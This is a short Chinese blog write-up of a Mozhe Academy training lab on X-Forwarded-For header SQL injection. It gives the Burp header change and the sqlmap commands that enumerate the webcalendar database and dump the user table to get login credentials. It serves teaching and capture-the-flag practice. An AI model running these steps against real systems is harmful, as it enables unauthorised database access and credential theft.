墨者学院:X-Forwarded-For注入漏洞实战

  • A+
所属分类:Web 学习笔记

背景介绍

某业务系统,安全工程师"墨者"进行授权黑盒测试,系统的业主单位也没有给账号密码,怎么测?

实训目标

1、掌握SQL注入的基本原理;
2、了解服务器获取客户端IP的方式;
3、了解SQL注入的工具使用;

解题方向

对登录表单的各参数进行测试,找到SQL注入点,对数据库内容进行读取,找到账号与密码。

启动场景,随便弱口令然后brup抓包

墨者学院:X-Forwarded-For注入漏洞实战

题目是X-Forwarded-For注入漏洞实战,brup抓包发现没有X-Forwarded-For头。就试试添加X-Forwarded-For:1.1.1.1试试,发现有回显,然后把X-Forwarded-For的值设置为*即X-Forwarded-For:*

墨者学院:X-Forwarded-For注入漏洞实战

然后将将数据包保存到文件用sqlmap扫描
python sqlmap.py -r 1.txt --batch 直接扫出XFF注入

墨者学院:X-Forwarded-For注入漏洞实战

python sqlmap.py -r 1.txt --batch --dbs    注出information_schema库和webcalendar库

墨者学院:X-Forwarded-For注入漏洞实战

python sqlmap.py -r 1.txt --batch -tables -D "webcalendar"    注出user和login表

墨者学院:X-Forwarded-For注入漏洞实战

python sqlmap.py -r 1.txt --batch --dump-all -T"user" -D"webcalendar" 暴躁dump出user里全部内容得到登录密码

墨者学院:X-Forwarded-For注入漏洞实战

然后登录即可得到flag

zore

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: